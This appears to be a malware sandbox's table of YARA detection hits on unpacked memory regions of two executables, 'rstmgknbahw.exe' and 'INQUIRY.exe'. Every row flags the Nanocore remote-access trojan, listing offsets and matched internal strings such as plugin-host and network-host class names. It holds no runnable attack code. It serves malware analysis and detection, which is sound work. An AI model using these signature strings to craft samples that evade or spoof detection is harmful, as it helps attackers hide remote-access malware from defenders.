6.2.rstmgknbahw.exe.3820e14.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x28259:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x29334:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x28273:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.3820e14.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.1.rstmgknbahw.exe.415058.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.1.rstmgknbahw.exe.415058.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
6.0.rstmgknbahw.exe.400000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x85e5:$x1: NanoCore.ClientPluginHost 0x8622:$x2: IClientNetworkHost 0xc155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.0.rstmgknbahw.exe.400000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x835d:$x1: NanoCore Client.exe 0x85e5:$x2: NanoCore.ClientPluginHost 0x9c1e:$s1: PluginCommand 0x9c12:$s2: FileCommand 0xaac3:$s3: PipeExists 0x1087a:$s4: PipeCreated 0x860f:$s5: IClientLoggingHost
4.0.rstmgknbahw.exe.400000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.0.rstmgknbahw.exe.400000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
6.0.rstmgknbahw.exe.400000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.0.rstmgknbahw.exe.400000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.0.rstmgknbahw.exe.400000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x834d:$a: NanoCore 0x835d:$a: NanoCore 0x8591:$a: NanoCore 0x85a5:$a: NanoCore 0x85e5:$a: NanoCore 0x83ac:$b: ClientPlugin 0x85ae:$b: ClientPlugin 0x85ee:$b: ClientPlugin 0x84d3:$c: ProjectData 0x8eda:$d: DESCrypto 0x108a6:$e: KeepAlive 0xe894:$g: LogClientMessage 0xaa8f:$i: get_Connected 0x9210:$j: #=q 0x9240:$j: #=q 0x925c:$j: #=q 0x928c:$j: #=q 0x92a8:$j: #=q 0x92c4:$j: #=q 0x92f4:$j: #=q 0x9310:$j: #=q
4.0.rstmgknbahw.exe.400000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.0.rstmgknbahw.exe.400000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x834d:$a: NanoCore 0x835d:$a: NanoCore 0x8591:$a: NanoCore 0x85a5:$a: NanoCore 0x85e5:$a: NanoCore 0x83ac:$b: ClientPlugin 0x85ae:$b: ClientPlugin 0x85ee:$b: ClientPlugin 0x84d3:$c: ProjectData 0x8eda:$d: DESCrypto 0x108a6:$e: KeepAlive 0xe894:$g: LogClientMessage 0xaa8f:$i: get_Connected 0x9210:$j: #=q 0x9240:$j: #=q 0x925c:$j: #=q 0x928c:$j: #=q 0x92a8:$j: #=q 0x92c4:$j: #=q 0x92f4:$j: #=q 0x9310:$j: #=q
4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
4.0.rstmgknbahw.exe.400000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
6.0.rstmgknbahw.exe.400000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x85e5:$x1: NanoCore.ClientPluginHost 0x8622:$x2: IClientNetworkHost 0xc155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.0.rstmgknbahw.exe.400000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x835d:$x1: NanoCore Client.exe 0x85e5:$x2: NanoCore.ClientPluginHost 0x9c1e:$s1: PluginCommand 0x9c12:$s2: FileCommand 0xaac3:$s3: PipeExists 0x1087a:$s4: PipeCreated 0x860f:$s5: IClientLoggingHost
4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.0.rstmgknbahw.exe.400000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
4.1.rstmgknbahw.exe.415058.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.0.rstmgknbahw.exe.400000.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x834d:$a: NanoCore 0x835d:$a: NanoCore 0x8591:$a: NanoCore 0x85a5:$a: NanoCore 0x85e5:$a: NanoCore 0x83ac:$b: ClientPlugin 0x85ae:$b: ClientPlugin 0x85ee:$b: ClientPlugin 0x84d3:$c: ProjectData 0x8eda:$d: DESCrypto 0x108a6:$e: KeepAlive 0xe894:$g: LogClientMessage 0xaa8f:$i: get_Connected 0x9210:$j: #=q 0x9240:$j: #=q 0x925c:$j: #=q 0x928c:$j: #=q 0x92a8:$j: #=q 0x92c4:$j: #=q 0x92f4:$j: #=q 0x9310:$j: #=q
4.1.rstmgknbahw.exe.415058.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
2.0.INQUIRY.exe.400000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x85e5:$x1: NanoCore.ClientPluginHost 0x8622:$x2: IClientNetworkHost 0xc155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.0.INQUIRY.exe.400000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x835d:$x1: NanoCore Client.exe 0x85e5:$x2: NanoCore.ClientPluginHost 0x9c1e:$s1: PluginCommand 0x9c12:$s2: FileCommand 0xaac3:$s3: PipeExists 0x1087a:$s4: PipeCreated 0x860f:$s5: IClientLoggingHost
2.0.INQUIRY.exe.400000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.0.INQUIRY.exe.400000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x834d:$a: NanoCore 0x835d:$a: NanoCore 0x8591:$a: NanoCore 0x85a5:$a: NanoCore 0x85e5:$a: NanoCore 0x83ac:$b: ClientPlugin 0x85ae:$b: ClientPlugin 0x85ee:$b: ClientPlugin 0x84d3:$c: ProjectData 0x8eda:$d: DESCrypto 0x108a6:$e: KeepAlive 0xe894:$g: LogClientMessage 0xaa8f:$i: get_Connected 0x9210:$j: #=q 0x9240:$j: #=q 0x925c:$j: #=q 0x928c:$j: #=q 0x92a8:$j: #=q 0x92c4:$j: #=q 0x92f4:$j: #=q 0x9310:$j: #=q
3.2.rstmgknbahw.exe.2300000.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.2.rstmgknbahw.exe.2300000.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
3.2.rstmgknbahw.exe.2300000.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.rstmgknbahw.exe.2300000.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
2.0.INQUIRY.exe.400000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.0.INQUIRY.exe.400000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
2.0.INQUIRY.exe.400000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.0.INQUIRY.exe.400000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
6.2.rstmgknbahw.exe.415058.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.rstmgknbahw.exe.415058.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.415058.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.rstmgknbahw.exe.415058.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
6.0.rstmgknbahw.exe.415058.10.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.0.rstmgknbahw.exe.415058.10.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
6.0.rstmgknbahw.exe.415058.10.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.0.rstmgknbahw.exe.415058.10.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
4.2.rstmgknbahw.exe.415058.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.rstmgknbahw.exe.415058.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.2.rstmgknbahw.exe.415058.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.rstmgknbahw.exe.415058.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
6.0.rstmgknbahw.exe.415058.12.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.0.rstmgknbahw.exe.415058.12.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
6.0.rstmgknbahw.exe.415058.12.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.0.rstmgknbahw.exe.415058.12.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
6.2.rstmgknbahw.exe.382543d.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x23c30:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x23c5d:$x2: IClientNetworkHost
6.2.rstmgknbahw.exe.382543d.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x23c30:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x24d0b:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x23c4a:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.382543d.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.0.INQUIRY.exe.400000.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.0.INQUIRY.exe.400000.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
2.0.INQUIRY.exe.400000.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.0.INQUIRY.exe.400000.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
2.0.INQUIRY.exe.400000.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.0.INQUIRY.exe.400000.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
2.0.INQUIRY.exe.400000.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.0.INQUIRY.exe.400000.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
6.0.rstmgknbahw.exe.400000.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.0.rstmgknbahw.exe.400000.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
6.0.rstmgknbahw.exe.400000.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.0.rstmgknbahw.exe.400000.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
3.2.rstmgknbahw.exe.2311458.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.2.rstmgknbahw.exe.2311458.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
3.2.rstmgknbahw.exe.2311458.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.rstmgknbahw.exe.2311458.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
4.2.rstmgknbahw.exe.2510000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.rstmgknbahw.exe.2510000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.2.rstmgknbahw.exe.2510000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.rstmgknbahw.exe.2510000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
4.2.rstmgknbahw.exe.3950e14.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28259:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x28286:$x2: IClientNetworkHost
